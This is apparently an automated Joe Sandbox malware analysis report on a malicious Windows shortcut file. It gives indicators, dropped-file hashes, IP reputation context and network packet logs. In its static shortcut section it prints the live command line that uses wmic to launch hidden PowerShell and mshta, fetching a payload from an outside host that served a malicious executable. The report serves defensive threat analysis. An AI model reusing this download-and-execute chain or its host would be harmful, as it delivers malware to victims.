      https://nins.in/cembra/power/powersearchuserLOZOrc0mshta.exe, 00000005.00000002.3258242166.000002845F1E0000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://nins.in/cembra/power/powersearchHumshta.exe, 00000005.00000002.3258533390.0000028C60E10000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://g.live.com/odclientsettings/Prod/C:edb.log.6.drfalse
        		high
        https://nins.in/cembra/power/powersearchRelPath=WMIC.exe, 00000000.00000003.2020914297.000002055E2C6000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://nins.in/cembra/power/powersearchHmshta.exe, 00000005.00000002.3257922633.000002845F020000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://nins.in/cembra/power/powersearchGmshta.exe, 00000005.00000002.3257406405.000000F7AD332000.00000004.00000010.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://nins.in/cembra/power/powersearch...5mshta.exe, 00000005.00000002.3259548931.0000028C61BF2000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://nins.in/cembra/power/powersearchNKmshta.exe, 00000005.00000002.3257942443.000002845F059000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://nins.in/cembra/power/powersearchhttps://nins.in/cembra/power/powersearchmshta.exe, 00000005.00000002.3261480510.0000028C66005000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://nins.in/mshta.exe, 00000005.00000002.3257942443.000002845F0A6000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: safe
        		unknown
        https://nins.in/cembra/power/powersearchC:mshta.exe, 00000005.00000002.3257942443.000002845F030000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3257942443.000002845F0EA000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://nins.in/cembra/power/powersearch$global:?powershell.exefalse
        • Avira URL Cloud: safe
        		unknown
        https://nins.in/cembra/power/powersearch0;mshta.exe, 00000005.00000002.3260581593.0000028C65BB8000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        216.10.240.70
        		nins.inIndia
        		394695PUBLIC-DOMAIN-REGISTRYUStrue

        Private

        IP
        127.0.0.1

        General Information

        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1570896
        Start date and time:2024-12-08 09:51:07 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 4m 36s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:9
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:h0UP1BcPk5.lnk
        renamed because original name is a hash value
        Original Sample Name:8aac762da1e4edaec3b7c4c891d9224c.lnk
        Detection:MAL
        Classification:mal96.evad.winLNK@7/13@3/2
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 2
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .lnk

        Warnings

        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
        • Excluded IPs from analysis (whitelisted): 23.218.208.109
        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
        • Execution Graph export aborted for target mshta.exe, PID 5756 because it is empty
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtEnumerateKey calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

        Simulations

        Behavior and APIs

        TimeTypeDescription
        03:51:56API Interceptor1x Sleep call for process: WMIC.exe modified
        03:52:04API Interceptor2x Sleep call for process: svchost.exe modified
        03:52:08API Interceptor1x Sleep call for process: mshta.exe modified

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        216.10.240.70Microsoft Fax.htmGet hashmaliciousHTMLPhisherBrowse

          Domains

          No context

          ASNs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          PUBLIC-DOMAIN-REGISTRYUSTi5nuRV7y4.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
          • 119.18.54.39
          m30zZYga23.exeGet hashmaliciousAgentTeslaBrowse
          • 208.91.199.223
          PO82200487.exeGet hashmaliciousAgentTeslaBrowse
          • 199.79.62.115
          ORDER#023_2024.exeGet hashmaliciousAgentTeslaBrowse
          • 199.79.62.115
          QFEWElNtpn.exeGet hashmaliciousAgentTeslaBrowse
          • 199.79.62.115
          SoA_14000048_002.exeGet hashmaliciousAgentTeslaBrowse
          • 199.79.62.115
          Quote 000002320.exeGet hashmaliciousAgentTeslaBrowse
          • 199.79.62.115
          new booking 9086432659087.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 162.251.80.30
          rAttached_updat.vbsGet hashmaliciousGuLoader, RemcosBrowse
          • 103.76.231.42
          LPO-2024-357.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 199.79.62.115

          JA3 Fingerprints

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          37f463bf4616ecd445d4a1937da06e19vzHOEzLbDj.exeGet hashmaliciousUnknownBrowse
          • 216.10.240.70
          WaveExecutor.exeGet hashmaliciousUnknownBrowse
          • 216.10.240.70
          Nexus-Executor.exeGet hashmaliciousUnknownBrowse
          • 216.10.240.70
          WaveExecutor.exeGet hashmaliciousUnknownBrowse
          • 216.10.240.70
          Nexus-Executor.exeGet hashmaliciousUnknownBrowse
          • 216.10.240.70
          Xeno Executor.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
          • 216.10.240.70
          file.exeGet hashmaliciousAmadey, CredGrabber, LummaC Stealer, Meduza Stealer, Stealc, VidarBrowse
          • 216.10.240.70
          file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
          • 216.10.240.70
          malware.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
          • 216.10.240.70
          INQUIRY REQUEST AND PRICES_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
          • 216.10.240.70

          Dropped Files

          No context

          Created / dropped Files

          C:\ProgramData\Microsoft\Network\Downloader\edb.log

          Download File
          Process:C:\Windows\System32\svchost.exe
          File Type:data
          Category:dropped
          Size (bytes):1310720
          Entropy (8bit):0.8307210565309133
          Encrypted:false
          SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugQ:gJjJGtpTq2yv1AuNZRY3diu8iBVqFa
          MD5:064D41BD0F0F86602280A63719B9E849
          SHA1:86D290AFD2E54A29620F72637C458D486212B0F9
          SHA-256:3BD91867635F30BE9EAEC2B8AC545C002CF8C95B4AD9F0532D46FDCDAE1C8D9B
          SHA-512:41959BF959277F20BABB0A1A548FE6297598A8C93B2A78AC48BCA2624C0FC770208F61711B91F9783578D237D443C602EACFA9BD7FCE87E59D3784B1352FAE27
          Malicious:false
          Reputation:low
          Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

          Download File
          Process:C:\Windows\System32\svchost.exe
          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x848d530c, page size 16384, DirtyShutdown, Windows version 10.0
          Category:dropped
          Size (bytes):1310720
          Entropy (8bit):0.6585856256363256
          Encrypted:false
          SSDEEP:1536:RSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:Raza9v5hYe92UOHDnAPZ4PZf9h/9h
          MD5:8B11A098E794B596669B16F42B7EE79C
          SHA1:D598AF64BC35A8AD1A1E831E5038CC4FAE498C1A
          SHA-256:5219CC77B308A258AEF4F140A070C2F9BB9A40380DC881D74D7DD5F9AD847D5F
          SHA-512:981AFCC4D4B43A5F125802055682D6C421424405FB1F8844BE3D5FB0A1DD33DAF716FC379ACDF0EFA6E6E98E34F1ED8DD6678EA835EFD015F2F5D3498DF7B120
          Malicious:false
          Reputation:low
          Preview:..S.... ...............X\...;...{......................0.z..........{...4...|%.h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{.......................................4...|%....................~.4...|%..........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

          C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

          Download File
          Process:C:\Windows\System32\svchost.exe
          File Type:data
          Category:dropped
          Size (bytes):16384
          Entropy (8bit):0.08072023533935217
          Encrypted:false
          SSDEEP:3:IUYeWAbrhVGuAJkhvekl1rTHC/l/allrekGltll/SPj:IUzPbrbrxlZHC/IJe3l
          MD5:357B0AED9B63BC553940C0F7D3C52CB0
          SHA1:BDE30EFA239D311A3BE800873DDD80600B67D515
          SHA-256:9867163660D420F82D39E60743EDC910F182ECAD1BDA19EC8EB0C43C4916B663
          SHA-512:CD28042CA4B5B632CD4A677835B6105E5324EF959C7E0F47AA91D6E3F3D4A36126D253042D905391C1814D2565C60B274DA88CCBEB62085148C67F21602AF4C7
          Malicious:false
          Reputation:low
          Preview::*0......................................;...{...4...|%......{...............{.......{...XL......{.....................~.4...|%.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT

          Download File
          Process:C:\Windows\System32\mshta.exe
          File Type:data
          Category:dropped
          Size (bytes):49120
          Entropy (8bit):0.0017331682157558962
          Encrypted:false
          SSDEEP:3:Ztt:T
          MD5:0392ADA071EB68355BED625D8F9695F3
          SHA1:777253141235B6C6AC92E17E297A1482E82252CC
          SHA-256:B1313DD95EAF63F33F86F72F09E2ECD700D11159A8693210C37470FCB84038F7
          SHA-512:EF659EEFCAB16221783ECB258D19801A1FF063478698CF4FCE3C9F98059CA7B1D060B0449E6FD89D3B70439D9735FA1D50088568FF46C9927DE45808250AEC2E
          Malicious:false
          Reputation:high, very likely benign file
          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\warning[1]

          Download File
          Process:C:\Windows\System32\mshta.exe
          File Type:GIF image data, version 89a, 36 x 38
          Category:dropped
          Size (bytes):1062
          Entropy (8bit):4.517838839626174
          Encrypted:false
          SSDEEP:12:z4ENetWsdvCMtkEFk+t2cd3ikIbOViGZVsMLfE4DMWUcC/GFvyVEZd6vcmadxVtS:nA/ag/QSi6/LKZzqKVQgJOexQkYfG6E
          MD5:124A9E7B6976F7570134B7034EE28D2B
          SHA1:E889BFC2A2E57491016B05DB966FC6297A174F55
          SHA-256:5F95EFF2BCAAEA82D0AE34A007DE3595C0D830AC4810EA4854E6526E261108E9
          SHA-512:EA1B3CC56BD41FC534AAC00F186180345CB2C06705B57C88C8A6953E6CE8B9A2E3809DDB01DAAC66FA9C424D517D2D14FA45FBEF9D74FEF8A809B71550C7C145
          Malicious:false
          Preview:GIF89a$.&.......h...............h.hh..h..h..h..h....h................h.................h.................h................hh.h..h..h..h..h.hhhhh.hh.hh.hh.hh..hh.h..h..h.h..h..hh.h..h..h..h..h..hh.h..h..h..h..h..hh.h..h..h..h..h...h...............h.hh..h..h..h..h....h...............h................h...........h.................h...............h.hh..h..h..h..h....h................h.................h.................h.................h..............h.hh.h..h..h..h....h..............h................h................h................h...............h.hh..h..h..h..h....h................h.................h.................h......................................................................................................................................!.......,....$.&.@......H.......<0.....VXQH..C..1>.(..@..C.t.q"B..S.\.r.D...Z.. .M.41.".......<.r.;.r4..P..]....+.T-...N...x....1.:..TdD...^.j..W.r...y....V...Lx0..):8p q.4.;...f`.r-K...(..P....t.].~..l..

          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\error[1]

          Download File
          Process:C:\Windows\System32\mshta.exe
          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
          Category:dropped
          Size (bytes):1706
          Entropy (8bit):5.274543201400288
          Encrypted:false
          SSDEEP:48:NIAbzyYh8rRLkRVNaktqavP61GJZoF+SMy:xWqxztqaHO
          MD5:B9BEC45642FF7A2588DC6CB4131EA833
          SHA1:4D150A53276C9B72457AE35320187A3C45F2F021
          SHA-256:B0ABE318200DCDE42E2125DF1F0239AE1EFA648C742DBF9A5B0D3397B903C21D
          SHA-512:C119F5625F1FC2BCDB20EE87E51FC73B31F130094947AC728636451C46DCED7B30954A059B24FEF99E1DB434581FD9E830ABCEB30D013404AAC4A7BB1186AD3A
          Malicious:false
          Preview:...window.onerror = HandleError..function HandleError(message, url, line)..{..var str = L_Dialog_ErrorMessage + "\n\n"..+ L_ErrorNumber_Text + line + "\n"..+ message;..alert (str);..window.close();..return true;..}..function loadBdy()..{..var objOptions = window.dialogArguments;..btnNo.onclick = new Function("btnOKClick()");..btnNo.onkeydown = new Function("SwitchFocus()");..btnYes.onclick = new Function("btnYesClick()");..btnYes.onkeydown = new Function("SwitchFocus()");..document.onkeypress = new Function("docKeypress()");..spnLine.innerText = objOptions.getAttribute("errorLine");..spnCharacter.innerText = objOptions.getAttribute("errorCharacter");..spnError.innerText = objOptions.getAttribute("errorMessage");..spnCode.innerText = objOptions.getAttribute("errorCode");..txaURL.innerText = objOptions.getAttribute("errorUrl");..if (objOptions.errorDebug)..{..divDebug.innerText = L_ContinueScript_Message;..}..btnYes.focus();..}..function SwitchFocus()..{..var HTML_KEY_ARROWLEFT = 37;..

          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\error[1]

          Download File
          Process:C:\Windows\System32\mshta.exe
          File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
          Category:dropped
          Size (bytes):3249
          Entropy (8bit):5.4598794938059125
          Encrypted:false
          SSDEEP:96:vKFrZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:CGpv+GkduSDl6LRa
          MD5:939A9FBD880F8B22D4CDD65B7324C6DB
          SHA1:62167D495B0993DD0396056B814ABAE415A996EE
          SHA-256:156E7226C757414F8FD450E28E19D0A404FDBA2571425B203FDC9C185CF7FF0E
          SHA-512:91428FFA2A79F3D05EBDB19ED7F6490A4CEE788DF709AB32E2CDC06AEC948CDCCCDAEBF12555BE4AD315234D30F44C477823A2592258E12D77091FA01308197B
          Malicious:false
          Preview:...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialogue.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonfa

          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\powersearch[1]

          Download File
          Process:C:\Windows\System32\mshta.exe
          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):464688
          Entropy (8bit):6.334973119749756
          Encrypted:false
          SSDEEP:6144:e+WoC/IdkUPq5l+WoC/IdkUPq50+WoC/IdkUPq57+WoC/IdkUPq5R+WoC/IdkUPO:epOkVpOkkpOkrpOkBpOk
          MD5:F5E8906C33A0BADCA3C1F060728790EA
          SHA1:82C52F13E1D6027A9C398160DCCB993032A97BAB
          SHA-256:9C241F531295F846B7A9FAB4F50AFFF7C84C2AA10A39DC69E1FA4D147DE97D3D
          SHA-512:9C5CCD00AF033F61D21FE2D839615361F90C793874A1EFDADDA013130135B8AABE673B486C0BD58207AEAC7C36867ED9F3E3072213B7914CBAD9BDF7BE5B7882
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 21%
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...3...3...3...C...3...C...3...C...3...C...3...3...2...C...3...Cw..3...C...3..Rich.3..........................PE..L...........................T....................@.................................{.....@...... ..........................P$..,....`..(....................p.......1..T............................................ ..L.......@....................text...X........................... ..`.data...............................@....idata..D)... ...*..................@..@.didat.......P.......4..............@....rsrc...(....`.......6..............@..@.reloc.......p.......B..............@..B................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):64
          Entropy (8bit):1.1940658735648508
          Encrypted:false
          SSDEEP:3:NlllulxmH/lZ:NllUg
          MD5:D904BDD752B6F23D81E93ECA3BD8E0F3
          SHA1:026D8B0D0F79861746760B0431AD46BAD2A01676
          SHA-256:B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2
          SHA-512:5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740
          Malicious:false
          Preview:@...e................................. ..............@..........

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ftuk45i.cki.ps1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3yc2ib5.fvr.psm1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

          Download File
          Process:C:\Windows\System32\svchost.exe
          File Type:JSON data
          Category:dropped
          Size (bytes):55
          Entropy (8bit):4.306461250274409
          Encrypted:false
          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
          MD5:DCA83F08D448911A14C22EBCACC5AD57
          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
          Malicious:false
          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

          \Device\ConDrv

          Download File
          Process:C:\Windows\System32\wbem\WMIC.exe
          File Type:ASCII text, with CRLF, CR line terminators
          Category:dropped
          Size (bytes):160
          Entropy (8bit):5.095703110114614
          Encrypted:false
          SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MglUdo0wFJQAiveyn:Yw7gJGWMXJXKSOdYiygKkXe/egO1qeAc
          MD5:B8EBE1F62E518A06E931BFD2A5B20AEF
          SHA1:B55E7E789E56D285CB918E22681E8AEE432B206D
          SHA-256:5898423CC07829D55A50471086412188642D679BD10FF4BB26D05D99B00D706B
          SHA-512:4FA27560D37E9F51E576FD50594789C1E192E75CD4FA88C06012D3675FADC20BA9F08E969AE531517723C81C61A2B828B441AC17F12E05B1DBC45F532D2F7A1E
          Malicious:false
          Preview:Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 7152;...ReturnValue = 0;..};....

          Static File Info

          General

          File type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=11, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
          Entropy (8bit):1.296359142517176
          TrID:
          • Windows Shortcut (20020/1) 100.00%
          File name:h0UP1BcPk5.lnk
          File size:4'297 bytes
          MD5:8aac762da1e4edaec3b7c4c891d9224c
          SHA1:32599c47d458df430469756ad1773307e3df870a
          SHA256:1e612ff0a9513a7407f349ee34eef01d81224507c6d31544f73cb45c22dcab71
          SHA512:4ebb3c0784b4756e94558553d50e8a3eef158602c9f5d27bec96c911d1824291e005166c7b0fb80cd9b58ef92e668d753bd20c6d2390d439993c37caff787d29
          SSDEEP:24:8lH/BUlgKN4eA+/3ukWNBvLqFmqdd79dsHLIQ:8BuGeHulBzqFVdJ9
          TLSH:63913A146BF90B10F3B68E32587AB321CA7B7C57DD128F1D019145891432A10ED76FAB
          File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................

          File Icon

          Icon Hash:72d282828e8d8dd5

          Static Windows Shortcut Info

          General

          Relative Path:..\..\..\Windows\System32\Wbem\wmic.exe
          Command Line Argument:process call create "powershell -w 1 . \W*\S*2\m*ht*e https://nins.in/cembra/power/powersearch"
          Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

          Network Behavior

          Network Port Distribution

          TCP Packets

          TimestampSource PortDest PortSource IPDest IP
          Dec 8, 2024 09:52:01.917006969 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:01.917059898 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:01.917179108 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:01.930391073 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:01.930404902 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:03.738233089 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:03.738390923 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:03.790410042 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:03.790431976 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:03.790667057 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:03.790721893 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:03.793601990 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:03.839327097 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:04.647782087 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:04.647813082 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:04.647860050 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:04.647885084 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:04.647900105 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:04.647926092 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:05.259407997 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:05.259419918 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:05.259490967 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:05.272882938 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:05.272952080 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:05.557800055 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:05.557810068 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:05.557885885 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:05.576168060 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:05.576250076 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:05.600595951 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:05.600670099 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:05.619088888 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:05.619170904 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:05.843688965 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:05.843698025 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:05.843770027 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:05.868398905 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:05.868482113 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:06.095733881 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:06.095745087 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:06.095823050 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:06.138987064 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:06.139067888 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:06.157084942 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:06.157186985 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:06.175528049 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:06.176553011 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:06.421330929 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:06.421340942 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:06.421510935 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:06.442742109 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:06.443053007 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:06.461087942 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:06.461175919 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:06.481357098 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:06.481488943 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:06.719338894 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:06.719350100 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:06.719655991 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:06.737907887 CET44349704216.10.240.70192.168.2.5
          Dec 8, 2024 09:52:06.739665031 CET49704443192.168.2.5216.10.240.70
          Dec 8, 2024 09:52:06.756232023 CET44349704216.10.240.70192.168.2.5
